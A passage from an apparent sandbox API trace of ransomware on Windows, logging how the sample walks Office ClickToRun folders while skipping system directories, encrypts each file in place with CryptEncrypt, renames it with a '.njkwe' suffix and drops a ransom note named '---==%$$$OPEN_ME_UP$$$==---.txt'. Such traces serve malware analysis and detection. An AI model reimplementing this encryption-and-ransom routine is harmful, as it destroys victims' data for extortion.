returned 0x0 [0069.600] lstrcmpW (lpString1="stream.Platform.x-none.man.xml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0069.600] lstrcmpW (lpString1="stream.Platform.x-none.man.xml", lpString2="taridd") returned -1 [0069.600] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\stre", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0069.600] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\stream.Platform.x-none.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\x-none.16\\stream.platform.x-none.man.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0069.601] GetTickCount () returned 0x1151c6e [0069.601] GetTickCount () returned 0x1151c6e [0069.601] GetTickCount () returned 0x1151c6e [0069.601] GetTickCount () returned 0x1151c6e [0069.601] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0069.601] GetProcessHeap () returned 0xbe0000 [0069.601] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4b838 [0069.601] ReadFile (in: hFile=0x43c, lpBuffer=0xc4b838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesRead=0x380edc4*=0x2800, lpOverlapped=0x0) returned 1 [0069.604] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.604] WriteFile (in: hFile=0x43c, lpBuffer=0xc4b838*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesWritten=0x380edc4*=0x2800, lpOverlapped=0x0) returned 1 [0069.604] GetProcessHeap () returned 0xbe0000 [0069.604] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4b838 | out: hHeap=0xbe0000) returned 1 [0069.604] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.604] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0069.614] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0069.614] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0069.614] CloseHandle (hObject=0x43c) returned 1 [0069.614] GetProcessHeap () returned 0xbe0000 [0069.614] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0069.614] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\stream.Platform.x-none.man.xml_r00t_{3sXlE5}.njkwe") returned 153 [0069.615] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\stream.Platform.x-none.man.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\x-none.16\\stream.platform.x-none.man.xml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\stream.Platform.x-none.man.xml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\x-none.16\\stream.platform.x-none.man.xml_r00t_{3sxle5}.njkwe")) returned 1 [0069.615] GetProcessHeap () returned 0xbe0000 [0069.615] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0069.615] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19fffcc2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x19fffcc2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x316a100, ftLastWriteTime.dwHighDateTime=0x1d32055, nFileSizeHigh=0x0, nFileSizeLow=0x80, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x86.x-none.hash", cAlternateFileName="STREAM~1.HAS")) returned 1 [0069.615] lstrcmpiW (lpString1="stream.x86.x-none.hash", lpString2="Windows") returned -1 [0069.615] lstrcmpiW (lpString1="stream.x86.x-none.hash", lpString2="$Recycle.bin") returned 1 [0069.615] lstrcmpiW (lpString1="stream.x86.x-none.hash", lpString2="System Volume Information") returned -1 [0069.615] lstrcmpiW (lpString1="stream.x86.x-none.hash", lpString2="Program Files") returned 1 [0069.615] lstrcmpiW (lpString1="stream.x86.x-none.hash", lpString2="Program Files (x86)") returned 1 [0069.616] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\stream.x86.x-none.hash") returned 125 [0069.616] StrStrIW (lpFirst="stream.x86.x-none.hash", lpSrch=".njkwe") returned 0x0 [0069.616] lstrcmpW (lpString1="stream.x86.x-none.hash", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0069.616] lstrcmpW (lpString1="stream.x86.x-none.hash", lpString2="taridd") returned -1 [0069.616] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\stre", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0069.616] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\stream.x86.x-none.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\x-none.16\\stream.x86.x-none.hash"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0069.616] GetTickCount () returned 0x1151c7d [0069.616] GetTickCount () returned 0x1151c7d [0069.616] GetTickCount () returned 0x1151c7d [0069.616] GetTickCount () returned 0x1151c7d [0069.616] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0069.616] GetProcessHeap () returned 0xbe0000 [0069.616] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4b838 [0069.616] ReadFile (in: hFile=0x43c, lpBuffer=0xc4b838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesRead=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0069.617] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffff80, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.617] WriteFile (in: hFile=0x43c, lpBuffer=0xc4b838*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0069.617] GetProcessHeap () returned 0xbe0000 [0069.617] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4b838 | out: hHeap=0xbe0000) returned 1 [0069.617] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.617] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0069.618] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0069.618] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0069.618] CloseHandle (hObject=0x43c) returned 1 [0069.618] GetProcessHeap () returned 0xbe0000 [0069.618] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0069.618] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\stream.x86.x-none.hash_r00t_{3sXlE5}.njkwe") returned 145 [0069.618] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\stream.x86.x-none.hash" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\x-none.16\\stream.x86.x-none.hash"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\stream.x86.x-none.hash_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\x-none.16\\stream.x86.x-none.hash_r00t_{3sxle5}.njkwe")) returned 1 [0069.619] GetProcessHeap () returned 0xbe0000 [0069.619] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0069.619] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19fffcc2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x19fffcc2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x447ce00, ftLastWriteTime.dwHighDateTime=0x1d32055, nFileSizeHigh=0x0, nFileSizeLow=0x460b47, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x86.x-none.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 1 [0069.619] lstrcmpiW (lpString1="stream.x86.x-none.man.dat", lpString2="Windows") returned -1 [0069.619] lstrcmpiW (lpString1="stream.x86.x-none.man.dat", lpString2="$Recycle.bin") returned 1 [0069.619] lstrcmpiW (lpString1="stream.x86.x-none.man.dat", lpString2="System Volume Information") returned -1 [0069.619] lstrcmpiW (lpString1="stream.x86.x-none.man.dat", lpString2="Program Files") returned 1 [0069.619] lstrcmpiW (lpString1="stream.x86.x-none.man.dat", lpString2="Program Files (x86)") returned 1 [0069.619] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\stream.x86.x-none.man.dat") returned 128 [0069.619] StrStrIW (lpFirst="stream.x86.x-none.man.dat", lpSrch=".njkwe") returned 0x0 [0069.619] lstrcmpW (lpString1="stream.x86.x-none.man.dat", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0069.619] lstrcmpW (lpString1="stream.x86.x-none.man.dat", lpString2="taridd") returned -1 [0069.619] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\stre", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0069.619] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\stream.x86.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\x-none.16\\stream.x86.x-none.man.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0069.685] GetTickCount () returned 0x1151ccb [0069.685] GetTickCount () returned 0x1151ccb [0069.685] GetTickCount () returned 0x1151ccb [0069.685] GetTickCount () returned 0x1151ccb [0069.686] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0069.686] GetProcessHeap () returned 0xbe0000 [0069.686] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4b838 [0069.686] ReadFile (in: hFile=0x43c, lpBuffer=0xc4b838, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesRead=0x380edc4*=0x2800, lpOverlapped=0x0) returned 1 [0069.689] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0069.689] WriteFile (in: hFile=0x43c, lpBuffer=0xc4b838*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc4b838*, lpNumberOfBytesWritten=0x380edc4*=0x2800, lpOverlapped=0x0) returned 1 [0069.689] GetProcessHeap () returned 0xbe0000 [0069.689] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4b838 | out: hHeap=0xbe0000) returned 1 [0069.689] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0069.689] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0069.691] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0069.691] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0069.691] CloseHandle (hObject=0x43c) returned 1 [0069.691] GetProcessHeap () returned 0xbe0000 [0069.691] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc46ed8 [0069.691] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\stream.x86.x-none.man.dat_r00t_{3sXlE5}.njkwe") returned 148 [0069.691] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\stream.x86.x-none.man.dat" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\x-none.16\\stream.x86.x-none.man.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\stream.x86.x-none.man.dat_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\x-none.16\\stream.x86.x-none.man.dat_r00t_{3sxle5}.njkwe")) returned 1 [0069.692] GetProcessHeap () returned 0xbe0000 [0069.692] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc46ed8 | out: hHeap=0xbe0000) returned 1 [0069.692] FindNextFileW (in: hFindFile=0xc1a060, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19fffcc2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x19fffcc2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x447ce00, ftLastWriteTime.dwHighDateTime=0x1d32055, nFileSizeHigh=0x0, nFileSizeLow=0x460b47, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="stream.x86.x-none.man.dat", cAlternateFileName="STREAM~1.DAT")) returned 0 [0069.692] FindClose (in: hFindFile=0xc1a060 | out: hFindFile=0xc1a060) returned 1 [0069.692] wnsprintfW (in: pszDest=0xc36140, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 134 [0069.692] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\x-none.16\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\x-none.16\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x438 [0069.693] WriteFile (in: hFile=0x438, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380edcc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380edcc*=0x351, lpOverlapped=0x0) returned 1 [0069.694] CloseHandle (hObject=0x438) returned 1 [0069.694] GetProcessHeap () returned 0xbe0000 [0069.694] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc36140 | out: hHeap=0xbe0000) returned 1 [0069.694] FindNextFileW (in: hFindFile=0xc1a360, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x19bd39c1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x1a025ed3, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1a025ed3, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="x-none.16", cAlternateFileName="")) returned 0 [0069.694] FindClose (in: hFindFile=0xc1a360 | out: hFindFile=0xc1a360) returned 1 [0069.695] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 124 [0069.695] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\5A65C4D7-3CDF-4BE4-8560-F036D300C13F\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\clicktorun\\productreleases\\5a65c4d7-3cdf-4be4-8560-f036d300c13f\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0069.695] WriteFile (in: hFile=0x434, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f054, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f054*=0x351, lpOverlapped=0x0) returned 1 [0069.696] CloseHandle (hObject=0x434) returned 1 [0069.696] GetProcessHeap () returned 0xbe0000 [0069.696] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0069.696] FindNextFileW (in: hFindFile=0xc19fe0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106db4bf, ftCreationTime.dwHighDateTime=0x1d327ce, ftLastAccessTime.dwLowDateTime=0x1141e67e, ftLastAccessTime.dwHighDateTime=0x1d327ce, ftLastWriteTime.dwLowDateTime=0x1141e67e, ftLastWriteTime.dwHighDateTime=0x1d327ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="A6A87302-92AE-41F2-AC52-73F5EE18259F", cAlternateFileName="A6A873~1")) returned 1 [0069.696] lstrcmpiW (lpString1="A6A87302-92AE-41F2-AC52-73F5EE18259F", lpString2="Windows") returned -1 [0069.696] lstrcmpiW (lpString1="A6A87302-92AE-41F2-AC52-73F5EE18259F", lpString2="$Recycle.bin") returned 1 [0069.696] lstrcmpiW (lpString1="A6A87302-92AE-41F2-AC52-73F5EE18259F", lpString2="System Volume Information") returned -1 [0069.696] lstrcmpiW (lpString1="A6A87302-92AE-41F2-AC52-73F5EE18259F", lpString2="Program Files") returned -1 [0069.696] lstrcmpiW (lpString1="A6A87302-92AE-41F2-AC52-73F5EE18259F", lpString2="Program Files (x86)") returned -1 [0069.696] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F") returned 92 [0069.696] lstrcmpW (lpString1="A6A87302-92AE-41F2-AC52-73F5EE18259F", lpString2=".") returned 1 [0069.696] lstrcmpW (lpString1="A6A87302-92AE-41F2-AC52-73F5EE18259F", lpString2="..") returned 1 [0069.696] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0069.696] GetProcessHeap () returned 0xbe0000 [0069.696] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0069.696] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\*") returned 94 [0069.696] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\*", lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106db4bf, ftCreationTime.dwHighDateTime=0x1d327ce, ftLastAccessTime.dwLowDateTime=0x1141e67e, ftLastAccessTime.dwHighDateTime=0x1d327ce, ftLastWriteTime.dwLowDateTime=0x1141e67e, ftLastWriteTime.dwHighDateTime=0x1d327ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a120 [0069.698] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0069.698] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0069.698] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0069.698] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0069.698] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0069.698] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\.") returned 94 [0069.698] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0069.698] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x106db4bf, ftCreationTime.dwHighDateTime=0x1d327ce, ftLastAccessTime.dwLowDateTime=0x1141e67e, ftLastAccessTime.dwHighDateTime=0x1d327ce, ftLastWriteTime.dwLowDateTime=0x1141e67e, ftLastWriteTime.dwHighDateTime=0x1d327ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0069.698] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0069.698] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0069.698] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0069.698] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0069.698] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0069.699] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\ProductReleases\\A6A87302-92AE-41F2-AC52-73F5EE18259F\\..") returned 95 [0069.699] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0069.699] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0069.699] FindNextFileW (in: hFindFile=0xc1a120, lpFindFileData=0x380f088 | out: lpFindFileData=0x380f088*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x110186f1, ftCreationTime.dwHighDateTime=0x1d327ce, ftLastAccessTime.dwLowDateTime=0x66b4e849, ftLastAccessTime.dwHighDateTime=0x1d327ce, ftLastWriteTime.dwLowDateTime=0x66b4e849, ftLastWriteTime.dwHighDateTime=0x1d327ce, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="en-us.16", cAlternateFileName="")) returned 1 [0069.699] 